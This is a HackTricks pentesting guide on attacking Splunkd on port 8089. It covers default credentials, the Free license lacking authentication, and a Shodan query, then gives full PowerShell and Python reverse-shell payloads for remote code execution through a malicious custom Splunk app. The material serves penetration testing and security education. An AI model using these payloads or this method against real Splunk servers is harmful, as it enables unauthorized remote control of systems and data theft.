8089-splunkd.md (5992B)
1 --- 2 title: "8089 - Pentesting Splunkd" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/8089-splunkd.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/8089-splunkd.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 8089 - Pentesting Splunkd 14 15 ## **Basic Information** 16 17 - Log analytics tool used for data gathering, analysis, and visualization 18 - Commonly used in security monitoring and business analytics 19 - Default ports: 20 - Web server: 8000 21 - Splunkd service: 8089 22 23 ### Vulnerability Vectors: 24 25 1. Free Version Exploitation 26 27 - Historical Splunk Enterprise trials could switch to a limited Free license after expiry; licensing and conversion behavior varies by release. 28 - The Free license historically disabled authentication, so verify the active license and current product documentation instead of assuming every port 8089 service is unauthenticated.<sup>[[2]](#references)</sup> 29 - Potential security risk if left unmanaged 30 - Administrators may overlook security implications 31 32 2. Credential Weaknesses 33 34 - Older releases used default credentials such as `admin:changeme`; current installations require an administrator password during setup. 35 - Newer versions: Credentials set during installation 36 - Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`) 37 38 3. Remote Code Execution Opportunities 39 40 - Multiple code execution methods: 41 - Server-side Django applications 42 - REST endpoints 43 - Scripted inputs 44 - Alerting scripts 45 - Cross-platform support (Windows/Linux) 46 - Scripted inputs can run: 47 - Bash scripts 48 - PowerShell scripts 49 - Batch scripts 50 51 Key Exploitation Potential: 52 53 - Sensitive data storage 54 - Lack of authentication in free version 55 - Multiple vectors for potential remote code execution 56 - Possibility of leveraging scripted inputs for system compromise 57 58 ### Shodan 59 60 - `Splunk build` 61 62 ## RCE 63 64 ### Create Custom Application 65 66 Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.<sup>[[1]](#references)</sup> 67 68 A custom application can define scripted inputs in supported interpreters such as shell, PowerShell, batch, or the Python runtime shipped with the applicable Splunk release. Interpreter availability and Python version are release/platform specific.<sup>[[3]](#references)</sup> 69 70 The `reverse_shell_splunk` example app includes a Python payload (`bin/rev.py`) and PowerShell launcher (`bin/run.ps1`); the direct file references are retained because they clarify the expected app layout. Use them only in an authorized lab or create a benign proof-of-execution app.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup> 71 72 The exploitation process follows a consistent methodology across platforms: 73 74 ```text 75 splunk_shell/ 76 ├── bin (reverse shell scripts) 77 └── default (inputs.conf configuration) 78 ``` 79 80 The critical configuration file `inputs.conf` enables the script by: 81 82 - Setting `disabled = 0` 83 - Configuring a 10-second execution interval 84 - Defining the script's source type 85 86 Deployment requires an account permitted to install apps (or filesystem access to an app directory), and the script runs with the OS privileges of the Splunk service account. It is not an unauthenticated primitive by itself.<sup>[[3]](#references)[[4]](#references)</sup> 87 88 1. Create the malicious application package 89 2. Set up a listener (Netcat/socat) on the attacking machine 90 3. Upload the application through Splunk's interface 91 4. Trigger automatic script execution upon upload 92 93 Sample Windows PowerShell reverse shell: 94 95 ```bash 96 $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443); 97 $stream = $client.GetStream(); 98 [byte[]]$bytes = 0..65535|%{0}; 99 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ 100 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 101 $sendback = (iex $data 2>&1 | Out-String ); 102 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; 103 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 104 $stream.Write($sendbyte,0,$sendbyte.Length); 105 $stream.Flush() 106 }; 107 $client.Close() 108 ``` 109 110 Sample Linux Python reverse shell: 111 112 ```python 113 import sys, socket, os, pty 114 ip = "10.10.14.15" 115 port = "443" 116 s = socket.socket() 117 s.connect((ip, int(port))) 118 [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] 119 pty.spawn('/bin/bash') 120 ``` 121 122 ### RCE & Privilege Escalation 123 124 In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: 125 126 127 [Splunk Lpe And Persistence](/hacktricks/linux-hardening/software-information/splunk-lpe-and-persistence) 128 129 ## References 130 131 - [1] [Attacking Splunk - RCE via custom application (HTB Academy)](https://academy.hackthebox.com/module/113/section/1213) 132 - [2] [Splunk — Types of Splunk software licenses](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/configure-splunk-licenses/types-of-splunk-software-licenses) 133 - [3] [Splunk Developer — Scripted input examples](https://dev.splunk.com/enterprise/docs/developapps/inputdatatypes/scriptedinputs/) 134 - [4] [Splunk — Install apps from a package](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/manage-apps-and-add-ons/install-apps-and-add-ons-from-an-installation-package) 135 - [5] [0xjpuff/reverse_shell_splunk](https://github.com/0xjpuff/reverse_shell_splunk) 136 - [6] [`reverse_shell_splunk/bin/rev.py`](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) 137 - [7] [`reverse_shell_splunk/bin/run.ps1`](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1)